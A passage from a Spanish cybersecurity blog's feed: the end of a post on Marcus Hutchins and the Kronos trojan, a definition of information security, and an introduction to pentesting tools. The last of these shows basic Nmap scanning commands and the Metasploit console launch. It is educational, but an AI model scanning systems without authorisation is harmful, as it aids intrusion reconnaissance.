convirtiendose en un heroe que&amp;nbsp;ahorró miles de millones a empresas de todo el mundo.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;Marcus llevaba una doble vida como empleado de una empresa de ciberseguridad y hacker a sueldo de ladrones de bancos, es por ello que semanas más tarde el héroe fue arrestado en los Estados Unidos por el FBI, esto nos muestra que en mundo de la ciberseguridad es muy fácil cruzar la línea de la legalidad.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;Su arrestado ocurrió en la ciudad de Las Vegas, donde ofreció charlas acerca de su experiencia desactivando WannaCry, el FBI tenia evidencias de prácticas de hacking en masa realizadas entre 2014 y 2015, que él era responsable del desarrollo del troyano bancario &#39;Kronos&#39;, el cual fue utilizado para robar cuentas de banco, códigos PIN y credenciales para realizar fraudes, así como para modificar los portales de los bancos desde cualquier navegador, además, se le acusa de &quot;conspiración criminal&quot; por vender el troyano por 3.000 dólares en webs ilícitas.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;Lo llevaron a una sala de interrogatorios y le preguntaron por Kronos. Confesó casi de inmediato. El fiscal lo acusó de diez delitos relacionados con ese programa. Podían caerle diez años. Pasó un par de semanas detenido hasta que sus admiradores reunieron dinero para pagar su fianza. Aleccionado por su letrado, se declaró inocente. Siguió un tira y afloja de meses con las autoridades. Si colaboraba y revelaba la identidad de otros hackers, como Vinny, le ofrecían retirar los cargos. Pero Hutchins no podía colaborar. No los conocía, solo sus seudónimos. No hubo trato y fue a juicio. «Como sabéis, me he declarado culpable de dos cargos (de los diez iniciales) relacionados con la creación de malware años antes de empezar mi carrera en ciberseguridad. Lamento estas acciones y acepto la responsabilidad por mis errores», publicó en Twitter.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;El juez Joseph Stadtmueller antes de dictar sentencia, dijo: «Llevo más de 30 años juzgando y he sentenciado a 2200 personas. Pero ninguna como usted. Y he visto de todo. Aprecio el hecho de se pueda ver lo innoble de su conducta contrapesado por la acción de un héroe». Y añadió: «Si no tomamos las medidas apropiadas para proteger la seguridad de estas maravillosas tecnologías en las que confiamos día a día, el potencial para el desastre es absoluto. Hacen falta individuos como usted que nos den las soluciones».&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;Hutchins fue declarado inocente. El juez estimó que ya había cumplido su deuda con la sociedad con el tiempo pasado en prisión preventiva, más un año en libertad condicional, que se cumple ahora. A final de mes podrá regresar a Reino Unido, rehacer su vida.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: large;&quot;&gt;Sigue trabajando como analista para Kryptos Logic. En un tuit ha señalado: «Existe la idea errónea de que para ser un experto en ciberseguridad antes hay que darse un paseo por el lado oscuro. No es cierto. Puedes aprender todo lo que necesitas legalmente. Quédate en el lado bueno».&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/7249222214651999024/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2023/02/historia-de-marcus-hutchins.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/7249222214651999024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/7249222214651999024'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2023/02/historia-de-marcus-hutchins.html' title='Historia de Marcus Hutchins'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHMzdGqI4SJgS0m2YpjN7ElQSBNVySeC8Nmg11FBG2vTqqLdbcfwHpqEymnv6zuB9kU101HC0ecTRS_OjQhHa7W3Rl1VvL_d4AmaSE91cENy_Q5iV8HiqoPwKIhECmlrIVHHuIaA27TXcENbvLUuE4FCs3zJLtNbOdQUvqRRUeaDH30ECV1OwxbS9/s72-c/Marcus%20Hutchins.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-8617269255550226787</id><published>2021-03-19T10:56:00.005-04:00</published><updated>2021-03-19T10:56:57.386-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad de Información"/><title type='text'>Seguridad de la Información</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSFie5Gag_XYFCTDJb6WHtDg2B2o3u6xYB-1MT76UkbVkCoWpQYKHwI1ht6VQvwxOhpvP0eeSKvT-AR5mXFMWzTG743CGbjDy4WoXwCl1I1_d735eXa7HjQjvJ6Xprm-AWZqCCMxq6JB4/s838/SEGURIDAD.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;400&quot; data-original-width=&quot;838&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSFie5Gag_XYFCTDJb6WHtDg2B2o3u6xYB-1MT76UkbVkCoWpQYKHwI1ht6VQvwxOhpvP0eeSKvT-AR5mXFMWzTG743CGbjDy4WoXwCl1I1_d735eXa7HjQjvJ6Xprm-AWZqCCMxq6JB4/s320/SEGURIDAD.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;¿Qué es seguridad de la información?&lt;/p&gt;&lt;p&gt;&quot;Es la preservación de la confidencialidad, integridad y disponibilidad de la información&quot; (Norma ISO/IEC 27000)&lt;/p&gt;&lt;p&gt;&quot;Se refiere a los procesos y metodologías las cuáles son diseñadas e implementadas para proteger la información electrónica, documental o cualquier otra forma de información&quot;. (SANS Institute)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/8617269255550226787/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2021/03/seguridad-de-la-informacion.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/8617269255550226787'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/8617269255550226787'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2021/03/seguridad-de-la-informacion.html' title='Seguridad de la Información'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSFie5Gag_XYFCTDJb6WHtDg2B2o3u6xYB-1MT76UkbVkCoWpQYKHwI1ht6VQvwxOhpvP0eeSKvT-AR5mXFMWzTG743CGbjDy4WoXwCl1I1_d735eXa7HjQjvJ6Xprm-AWZqCCMxq6JB4/s72-c/SEGURIDAD.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-8888429079596260879</id><published>2018-08-22T11:16:00.002-04:00</published><updated>2018-08-22T17:38:08.774-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><category scheme="http://www.blogger.com/atom/ns#" term="Informática Forense"/><category scheme="http://www.blogger.com/atom/ns#" term="Investigación"/><title type='text'>¿Que es un #Ingenier@ de #Ciberseguridad?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr62-gSir_OyTgw0gnMWI-O343lq7qVSYofwiDS799GNIAjkxrCf4fc8RHbsPWHFSmMaXefu4e7To9yM9jeNpl8G2YAtO8KnG53aNkH4IIlYq0w9ypmco05k_navsu1l7_PDhQNdUnu4w/s1600/IngenierodeSeguridad.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;450&quot; data-original-width=&quot;594&quot; height=&quot;484&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr62-gSir_OyTgw0gnMWI-O343lq7qVSYofwiDS799GNIAjkxrCf4fc8RHbsPWHFSmMaXefu4e7To9yM9jeNpl8G2YAtO8KnG53aNkH4IIlYq0w9ypmco05k_navsu1l7_PDhQNdUnu4w/s640/IngenierodeSeguridad.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;¿Que es un Ingeniero de #Ciberseguridad?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Es un profesional cuya principal labor es detectar fallos de seguridad y habilitar mecanismos para evitar los posibles ataques a esos puntos vulnerables, por lo tanto su labor es compleja, ya que involucra un proceso en donde se realizan distintos tipos de tareas para identifican las vulnerabilidades que podrían explotarse y los daños que podría causar un atacante. En otras palabras, se realiza un proceso de hacking ético para identificar qué incidentes podrían ocurrir antes de que sucedan y, posteriormente, reparar o mejorar el sistema, de tal forma que se eviten estos ataques.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKX9XEtQGgYeelTwVTMcb2HITx0FIx7NjWsH-QjHrdHQggcebOb0O0zUYo2TsLgcJeLTeO3SIANeUjEbhUqFx7GX1yXHOmDXrAKfyweYH34L85DXyE6RUYlEB5mfdFT9rpyoyhACrmSU/s1600/ciberseguridad.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;370&quot; data-original-width=&quot;660&quot; height=&quot;179&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKX9XEtQGgYeelTwVTMcb2HITx0FIx7NjWsH-QjHrdHQggcebOb0O0zUYo2TsLgcJeLTeO3SIANeUjEbhUqFx7GX1yXHOmDXrAKfyweYH34L85DXyE6RUYlEB5mfdFT9rpyoyhACrmSU/s320/ciberseguridad.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;¿Qué es la&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ciberseguridad?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;La ciberseguridad también conocida como seguridad informática o seguridad de tecnologías de la información, es el área que se enfoca en la protección de la infraestructura tecnológica&amp;nbsp;y en especialmente a la información contenida en esta.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1gW_TtbsnE9n7fdqC-yPB-UYHcqZbpwqMFpjS1fnfhbONGIopHxrrl6HOIDH5l-eA3qBUW8oshtkniVeJaIGjWt9q-5Sgcn8oUrTOG8DNMJlUzj7KK443nD3MeSuA_I1Z9HdpEDHys4Q/s1600/ingeniero.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;263&quot; data-original-width=&quot;414&quot; height=&quot;203&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1gW_TtbsnE9n7fdqC-yPB-UYHcqZbpwqMFpjS1fnfhbONGIopHxrrl6HOIDH5l-eA3qBUW8oshtkniVeJaIGjWt9q-5Sgcn8oUrTOG8DNMJlUzj7KK443nD3MeSuA_I1Z9HdpEDHys4Q/s320/ingeniero.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;¿Cuales son las aptitudes principales de su personalidad?&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Polifacético o Polifacética: &lt;/b&gt;Es apto para varias disciplinas, que se suman a sus conocimientos en ética hacker, como es la programación, las metodologías, la documentación, entre otros, por ello debe tener capacidad para sobresalir en varias tareas o campos y para ejecutar muchas actividades conectadas entre sí. No obstante, esos aprendizajes suelen venir una vez que se conocen y se saben utilizar muchas herramientas seguridad que son parte del proceso, entre ellas podemos mencionar los conocimientos que se adquiere en seguridad en redes (Firewalls, Routers, IPS, etc), se seguridad de plataformas (Windows, Linux, Unix) y Seguridad en Bases de Datos (SQL, DB2, Oracle), entre otras.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Ingenioso o Ingeniosa: &lt;/b&gt;Buscar soluciones tangible o constructivas en base a un plan estratégico y de riesgo que puede ser ejecutado. Muchas veces tienes que crear algo a partir de la nada. Un objetivo de ataque comienzan en su mente. Interpreta y  pone su inteligencia para ofrecer un informe que realmente brinde valor a su cliente&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Actitud analítica: &lt;/b&gt;Necesitan una mente analítica, capaz de ver y analizar hasta el más mínimo detalle y con ello proponer soluciones. Una mente analítica, lógica y con razonamiento debe sobreponerse ante una mente idealista cuando hablamos de un ataque.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Trabajador: &lt;/b&gt;La actividad y el dinamismo son parte de la Ingeniería en Seguridad. Es una carrera que exige mucho mental y físicamente.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Colaboración: &lt;/b&gt;&quot;Acción y efecto de colaborar&quot; No es necesario que tengas grandes habilidades sociales, El aprendizaje colaborativo es uno de los componentes esenciales, actualmente es necesario trabajar en equipo, con integración y comunicación&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Detallista: &lt;/b&gt;Debe ser meticuloso, el más mínimo error causaría que algo colapse.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Se toma en serio la educación: &lt;/b&gt;La tecnología como herramienta para la Ingeniería siempre avanza.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJt-1HI6pAXHp67GsjDG_cr651OO3atI71ByePOfpLkYJEgYhJUOrfKarcnD1b6hF5LvAHtOw6flnnRSvAvd3ocxrueiUWvuGGbIM4LMFO1pNaykRutkUJdCKeWRqDYU07JJU9gJx7R8M/s1600/pruebas_pen-02.png&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJt-1HI6pAXHp67GsjDG_cr651OO3atI71ByePOfpLkYJEgYhJUOrfKarcnD1b6hF5LvAHtOw6flnnRSvAvd3ocxrueiUWvuGGbIM4LMFO1pNaykRutkUJdCKeWRqDYU07JJU9gJx7R8M/s320/pruebas_pen-02.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;¿Que herramientas utilizan un ingeniero de ciberseguridad?&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQGpYXWhbA6-ze11pSGKN8XPl0HQ5dH07on4d58HXsEnyDotz8mArei4IPBYm-G6zoEJYMbPlzxSyHivfTiLVKCRCHaBbsBwVRJsbK-vn_B1GEKIniKwtgunx2U04NlipxBwjZ53_cag8/s1600/nmap.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;256&quot; data-original-width=&quot;256&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQGpYXWhbA6-ze11pSGKN8XPl0HQ5dH07on4d58HXsEnyDotz8mArei4IPBYm-G6zoEJYMbPlzxSyHivfTiLVKCRCHaBbsBwVRJsbK-vn_B1GEKIniKwtgunx2U04NlipxBwjZ53_cag8/s1600/nmap.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;NMAP: &lt;/b&gt;Es una herramienta de escaneo de redes que permite identificar qué servicios se están ejecutando en un dispositivo remoto, así como la identificación de equipos activos, sistemas operativos en el equipo remoto, existencia de filtros o firewalls, entre otros.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
En palabras sencillas, cuando se va a atacar un servidor o dispositivo, el atacante podrá realizar distintas arremetidas en función del servicio: no es lo mismo dañar un servidor web, un servidor de base de datos o un router perimetral. Por lo tanto, en cualquier despliegue, el primer paso será identificar los servicios en la infraestructura, para decidir cómo avanzar y, considerando que en una prueba de penetración se “imitan” los pasos de un atacante, también se iniciará de la misma manera.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nmap es una herramienta de línea de comandos (existen algunas interfaces gráficas pero, personalmente, no las recomiendo, aunque es una cuestión de gustos) donde se debe indicar cuál será el o los objetivos y la serie de parámetros que afectarán la forma en que se ejecuten las pruebas y los resultados que se obtienen. Puede instalarse tanto en Linux, Windows, Mac u otros sistemas operativos.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
En su forma tradicional, una línea de comando sería la siguiente:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;gt; nmap 172.16.1.1&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
En donde nmap es el comando en sí mismo y 172.16.1.1 es el objetivo (que también puede ser indicado con un nombre de dominio). La respuesta a estos comandos será un listado de los puertos abiertos o cerrados en dicha dirección. La ejecución sin parámetros ejecuta un escaneo sencillo a los 1000 puertos más comunes (véase que en la imagen se muestra uno abierto y 999 cerrados), realizando anteriormente un ping para ver si el equipo está vivo (si el equipo no responde al ping, no se realizará el test de los puertos).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Cuando agregas parámetros puedes obtener mejores resultados. Algunos parámetros comunes para tener en cuenta son:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
[-iL] puedes indicar una lista de equipos o redes a escanear. &amp;gt; nmap –iL hosts.txt&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
[-sP] solo escanea con un ping. Es una buena forma de ver cuántas direcciones IP se pueden checar. Una vez que se tienen enlistadas, se podrá ir solo con las que están vivas.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
[-P0] es la forma de omitir el ping e ir directo al escaneo de puertos. Muchos sistemas no responden el ping como método de seguridad, por lo que, escanearlos de todas formas, también puede ser útil en entornos más reales (no es necesario para los entornos de aprendizaje inicial).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
[-p] lista los puertos que se desean escanear. &amp;gt; nmap –iL hosts.txt –p 22,25,80,445&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
[-sV] intenta determinar la versión del servicio en el objetivo.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
[-O] informa el sistema operativo en el objetivo.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Una vez ejecutado Nmap, ya se conocen cuáles son los servicios (al menos los identificados) que se están ejecutando en el blanco de la prueba de penetración. Ahora ya se puede pasar a las siguientes etapas, en donde se utilizará esta información para comenzar la búsqueda de vulnerabilidades en la infraestructura y en los servicios identificados.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Ficha técnica&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Herramienta: Nmap&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Sitio web: http://nmap.org/&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Cómo empezar: instalarlo, ejecutar un comando sencillo hacia una dirección IP y luego probar agregando parámetros (nmap --help puede brindar más información) o ejecutar para múltiples direcciones IP (que deben ser indicadas en un archivo TXT).&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs8pJOZ3_cWNYJL4qhs-_j50anMnnBiXefUTal2ejYpWAvIyFIIHI16PNT3IMmoSuGfrrkHxWTsHiYITBrr_0S8FlA8ZU8j_wCikHN-EJMsCjSLnGG0nxa-mEmxBIYZORw3i5js4TxBM8/s1600/nessus.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;227&quot; data-original-width=&quot;753&quot; height=&quot;96&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs8pJOZ3_cWNYJL4qhs-_j50anMnnBiXefUTal2ejYpWAvIyFIIHI16PNT3IMmoSuGfrrkHxWTsHiYITBrr_0S8FlA8ZU8j_wCikHN-EJMsCjSLnGG0nxa-mEmxBIYZORw3i5js4TxBM8/s320/nessus.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;NESSUS: &lt;/b&gt;Es un scanner de vulnerabilidades en los servicios, posee una interfaz gráfica, muy completa e intuitiva, es una forma sencilla de comenzar a probar esta herramienta. Nessus posee una extensa base de datos de vulnerabilidades conocidas en distintos servicios y, por cada una de éstas, posee plugins que se ejecutan para identificar si la vulnerabilidad existe (o no) en determinado equipo objetivo. En resumen, al ejecutarse Nessus sin parámetros específicos, se probarán miles de vulnerabilidades y se obtendrá como resultado un listado de las vulnerabilidades que fueron identificadas.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
La lógica de Nessus es similar a Nmap: hay que indicar el objetivo, en este caso la o las direcciones IP y los parámetros. Estos permiten limitar el campo de búsqueda, especialmente si en una etapa anterior se identificaron los servicios: no tiene sentido buscar vulnerabilidades conocidas en Linux en un equipo que tiene instalado Windows.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ficha técnica&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Herramienta: Nessus&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Sitio web: http://www.tenable.com/products/nessus/&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Cómo empezar: Si tienes Windows, instalarlo ahí por interfaz gráfica es muy sencillo, funciona para conocerlo por primera vez. Recomiendo buscar el listado de plugins y ejecutar pruebas limitando solo a determinados servicios.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Más información: Un listado completo de plugins está disponible en el sitio web, la lectura de las descripciones es muy útil para aprender más sobre vulnerabilidades en diversas plataformas (http://www.tenable.com/plugins/index.php?view=all).&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmza1bBA6DN6Iz9-mIoanznsb8gEod_soHxKprc2L8bwtP0UoL0W1Ex8hiK2_cWSt8WGQh7XNfiyRcoV5K0zGrMycfUa6dxWO_ZYL203n0c3fxx9Oa5VcCgLfr1kv3x5-Y48bXqkl-Heg/s1600/metasploits.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;237&quot; data-original-width=&quot;229&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmza1bBA6DN6Iz9-mIoanznsb8gEod_soHxKprc2L8bwtP0UoL0W1Ex8hiK2_cWSt8WGQh7XNfiyRcoV5K0zGrMycfUa6dxWO_ZYL203n0c3fxx9Oa5VcCgLfr1kv3x5-Y48bXqkl-Heg/s1600/metasploits.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;METASPLOIT FRAMEWORK: &lt;/b&gt;Es la herramienta ideal para hacer estas pruebas. Mientras Nessus posee una base de datos de vulnerabilidades, Metasploit posee una base de exploits que podrían aprovecharlas. En otras palabras, en lugar de revisar si hay una vulnerabilidad en un equipo remoto, directamente se intenta la ejecución de un exploit y se simulan las consecuencias posteriores, en caso de que éste se ejecutara con éxito.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Al igual que Nessus, su versión de línea de comandos, msfconsole, es la tradicional, incluso recomendable para la automatización. Sin embargo, su interfaz gráfica es muy conveniente para dar los primeros pasos y tener una mayor comprensión.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Si quieres probar la línea de comandos puedes hacer las primeras pruebas. En Windows puedes abrirla directamente desde el Menú de inicio como “Metasploit Console”. En Linux, tan solo puedes ejecutar un simple comando:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;gt; sudo msfpro&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Una vez que estás en la consola, verás que cambia el prompt:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf-pro &amp;gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
